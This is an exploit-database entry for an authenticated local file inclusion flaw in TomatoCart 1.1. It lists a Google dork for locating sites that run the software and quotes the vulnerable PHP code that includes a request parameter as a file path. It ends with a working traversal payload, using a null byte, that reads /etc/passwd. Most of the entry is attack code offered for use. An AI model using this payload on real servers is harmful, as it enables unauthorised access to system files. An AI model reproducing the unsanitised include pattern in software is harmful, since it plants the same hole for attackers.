TomatoCart 1.1 - (Authenticated) Local File Inclusion



EKU-ID: 23707 CVE: OSVDB-86072 OSVDB-ID:
Author: brain[pillow] Published: 2011-09-12 Verified: Not Verified
Download:

Rating

☆☆☆☆☆
Home


# Exploit Title: TomatoCart 1.1 PostAuth Local File Include
# Google Dork: "Powered by TomatoCart"
# Date: 25.10.2010
# Author: brain[pillow]
# Software Link: http://www.tomatocart.com/
# Version: 1.1

=========================================================
# Vuln. code:

 if ($osC_Customer->isLoggedOn() === true) {

    if (isset($_REQUEST['module'])) {
      $module = $_REQUEST['module'];
      $osC_Language->load($module);
    }

    if (isset($_REQUEST['pdf'])) {
      $pdf = $_REQUEST['pdf'];
    }

    if (!empty($module) && !empty($pdf)) {


      if (file_exists('includes/modules/pdf/' . $pdf . '.php')) {
        include('includes/modules/pdf/' . $pdf . '.php');

        $pdf_class = 'toC_' .ucfirst($pdf) . '_PDF';
        $object = new $pdf_class();
        $object ->render();

        exit;
      }
    }
  }

=========================================================
# Exploit:

/pdf.php?module=1&pdf=../../../../../../../../../../../../../etc/passwd%00